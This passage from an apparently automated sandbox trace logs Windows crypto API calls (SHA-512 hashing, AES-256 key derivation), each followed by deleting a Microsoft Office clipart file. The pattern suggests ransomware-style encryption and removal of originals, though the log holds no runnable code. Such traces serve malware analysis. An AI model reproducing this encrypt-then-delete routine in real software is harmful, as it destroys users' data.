(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf")) returned 1 [0200.006] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.006] wcslen (_String="OK") returned 0x2 [0200.006] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.006] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.006] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.006] CryptDestroyHash (hHash=0x9ad438) returned 1 [0200.006] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0200.008] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0200.008] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.008] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad8b8) returned 1 [0200.008] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.008] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.008] wcslen (_String="\\\\?\\") returned 0x4 [0200.025] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 1 [0200.025] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf")) returned 1 [0200.027] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0200.027] wcslen (_String="OK") returned 0x2 [0200.027] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.027] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.027] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0200.027] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0200.027] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0200.029] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44486c | out: phHash=0x1d44486c) returned 1 [0200.029] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.029] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444870 | out: phKey=0x1d444870*=0x9ad278) returned 1 [0200.029] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.029] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.029] wcslen (_String="\\\\?\\") returned 0x4 [0200.056] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 1 [0200.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf")) returned 1 [0200.057] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.057] wcslen (_String="OK") returned 0x2 [0200.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.057] CryptDestroyKey (hKey=0x9ad278) returned 1 [0200.057] CryptDestroyHash (hHash=0x9ad538) returned 1 [0200.058] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0200.060] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0200.060] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.060] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad2b8) returned 1 [0200.060] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.060] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.060] wcslen (_String="\\\\?\\") returned 0x4 [0200.142] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 1 [0200.142] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf")) returned 1 [0200.143] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.143] wcslen (_String="OK") returned 0x2 [0200.144] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.144] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.144] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0200.144] CryptDestroyHash (hHash=0x9ad878) returned 1 [0200.144] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0200.146] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0200.146] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.146] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad138) returned 1 [0200.146] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.146] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.146] wcslen (_String="\\\\?\\") returned 0x4 [0200.160] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 1 [0200.161] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf")) returned 1 [0200.162] CryptDestroyKey (hKey=0x9ad438) returned 1 [0200.162] wcslen (_String="OK") returned 0x2 [0200.162] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.162] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.162] CryptDestroyKey (hKey=0x9ad138) returned 1 [0200.162] CryptDestroyHash (hHash=0x9ad838) returned 1 [0200.162] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0200.165] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0200.165] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.165] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad1b8) returned 1 [0200.165] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.165] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.165] wcslen (_String="\\\\?\\") returned 0x4 [0200.200] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 1 [0200.201] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf")) returned 1 [0200.202] CryptDestroyKey (hKey=0x9ad738) returned 1 [0200.202] wcslen (_String="OK") returned 0x2 [0200.202] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.202] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.202] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0200.202] CryptDestroyHash (hHash=0x9ad478) returned 1 [0200.202] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0200.204] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0200.205] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.205] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad4f8) returned 1 [0200.205] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.205] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.205] wcslen (_String="\\\\?\\") returned 0x4 [0200.225] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 1 [0200.225] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf")) returned 1 [0200.229] CryptDestroyKey (hKey=0x9ad578) returned 1 [0200.230] wcslen (_String="OK") returned 0x2 [0200.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.230] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.230] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0200.230] CryptDestroyHash (hHash=0x9ad538) returned 1 [0200.230] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0200.232] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0200.232] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.232] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad838) returned 1 [0200.232] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.232] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.232] wcslen (_String="\\\\?\\") returned 0x4 [0200.247] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 1 [0200.247] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf")) returned 1 [0200.249] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0200.249] wcslen (_String="OK") returned 0x2 [0200.249] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.249] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.249] CryptDestroyKey (hKey=0x9ad838) returned 1 [0200.249] CryptDestroyHash (hHash=0x9ad478) returned 1 [0200.249] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0200.251] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0200.251] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.251] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad7f8) returned 1 [0200.251] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.251] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.251] wcslen (_String="\\\\?\\") returned 0x4 [0200.269] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 1 [0200.269] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf")) returned 1 [0200.271] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0200.271] wcslen (_String="OK") returned 0x2 [0200.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.271] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0200.271] CryptDestroyHash (hHash=0x9ad478) returned 1 [0200.271] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0200.272] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0200.273] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.273] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad478) returned 1 [0200.273] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.273] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.273] wcslen (_String="\\\\?\\") returned 0x4 [0200.278] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 1 [0200.279] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf")) returned 1 [0200.280] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.280] wcslen (_String="OK") returned 0x2 [0200.280] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.280] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.280] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.280] CryptDestroyHash (hHash=0x9ad138) returned 1 [0200.280] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0200.283] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0200.283] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.283] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad578) returned 1 [0200.283] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.283] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.283] wcslen (_String="\\\\?\\") returned 0x4 [0200.317] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 1 [0200.317] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf")) returned 1 [0200.318] CryptDestroyKey (hKey=0x9ad138) returned 1 [0200.318] wcslen (_String="OK") returned 0x2 [0200.318] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.318] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.318] CryptDestroyKey (hKey=0x9ad578) returned 1 [0200.318] CryptDestroyHash (hHash=0x9ad378) returned 1 [0200.318] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0200.320] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0200.320] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.320] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad1f8) returned 1 [0200.320] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.320] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.320] wcslen (_String="\\\\?\\") returned 0x4 [0200.323] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 1 [0200.323] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf")) returned 1 [0200.324] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0200.324] wcslen (_String="OK") returned 0x2 [0200.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.324] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.324] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0200.324] CryptDestroyHash (hHash=0x9ad238) returned 1 [0200.324] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0200.326] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0200.326] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.326] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad878) returned 1 [0200.326] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.326] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.326] wcslen (_String="\\\\?\\") returned 0x4 [0200.361] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 1 [0200.361] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf")) returned 1 [0200.363] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0200.363] wcslen (_String="OK") returned 0x2 [0200.363] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.363] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.363] CryptDestroyKey (hKey=0x9ad878) returned 1 [0200.363] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0200.363] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0200.365] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0200.365] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.365] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad7f8) returned 1 [0200.365] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.366] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.366] wcslen (_String="\\\\?\\") returned 0x4 [0200.417] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 1 [0200.418] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf")) returned 1 [0200.419] CryptDestroyKey (hKey=0x9ad178) returned 1 [0200.419] wcslen (_String="OK") returned 0x2 [0200.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.419] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0200.419] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0200.419] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0200.421] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0200.421] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.421] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad878) returned 1 [0200.422] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.422] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.422] wcslen (_String="\\\\?\\") returned 0x4 [0200.427] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 1 [0200.427] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf")) returned 1 [0200.428] CryptDestroyKey (hKey=0x9ad738) returned 1 [0200.428] wcslen (_String="OK") returned 0x2 [0200.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.428] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.428] CryptDestroyKey (hKey=0x9ad878) returned 1 [0200.428] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0200.428] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0200.431] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0200.431] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.431] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad1f8) returned 1 [0200.431] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.431] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.431] wcslen (_String="\\\\?\\") returned 0x4 [0200.473] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 1 [0200.473] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf")) returned 1 [0200.474] CryptDestroyKey (hKey=0x9ad538) returned 1 [0200.474] wcslen (_String="OK") returned 0x2 [0200.474] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.474] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.474] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0200.474] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0200.474] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0200.476] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0200.476] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.476] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1b8) returned 1 [0200.476] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.476] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.476] wcslen (_String="\\\\?\\") returned 0x4 [0200.492] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 1 [0200.493] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf")) returned 1 [0200.494] CryptDestroyKey (hKey=0x9ad438) returned 1 [0200.494] wcslen (_String="OK") returned 0x2 [0200.494] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.494] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.494] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0200.494] CryptDestroyHash (hHash=0x9ad838) returned 1 [0200.494] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0200.498] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0200.498] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.498] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad778) returned 1 [0200.498] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.498] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.498] wcslen (_String="\\\\?\\") returned 0x4 [0200.532] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 1 [0200.532] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft 